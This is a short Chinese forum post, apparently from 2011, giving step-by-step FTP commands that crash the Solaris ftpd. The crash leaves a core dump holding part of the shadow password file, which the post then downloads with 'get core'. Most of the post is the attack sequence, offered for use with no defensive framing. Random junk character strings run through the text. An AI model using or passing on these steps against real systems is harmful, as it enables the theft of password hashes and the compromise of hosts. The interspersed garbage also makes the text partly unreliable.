该方法利用了Solaris 操作系统中FTPD的一个BUG,使得用户可以获得该机的口令文件。具体过程如下:6 }: a/ x) B& O' W3 V. f( i0 R
: o; k( V9 G. n
1.通过 ftp 正常登录到目的主机上& c3 V) q* F3 t I9 ?+ I
2 m0 a/ A, d/ G* W
2.输入如下命令序列:
4 @, P3 n. [( G5 c1 P
/ @4 H- l$ ]' @( h1 ~, _ftp> user root wrongpasswd
$ c5 g- E7 b/ [9 R& X$ \: M+ F5 I1 T5 \0 L9 {! w" f
ftp> quote pasv0 D6 u4 ]; e* h# y0 G3 c/ ~# |
# h( {1 U0 n7 I3.这时,ftpd会报错退出,同时会在当前目录下生成一个core,口令文件就包含在这个core中。
3 D, N' w9 w1 P2 J+ r
: c5 E: Z5 I; [ o% e4.再次进入FTP >get core
0 i- N( r: N. P; s) E! B6 v j+ ~& a2 v0 }
补充:虽然在core只有一部分shadow,但是对于系统来说已经是致命的打击了0 Z/ R2 r6 J5 M' G' |+ a* L
$ ]4 n3 z" a4 | O3 ` |
|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港
( 鲁ICP备19052200号-1 )
发表于 2011-1-12 21:01:38
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡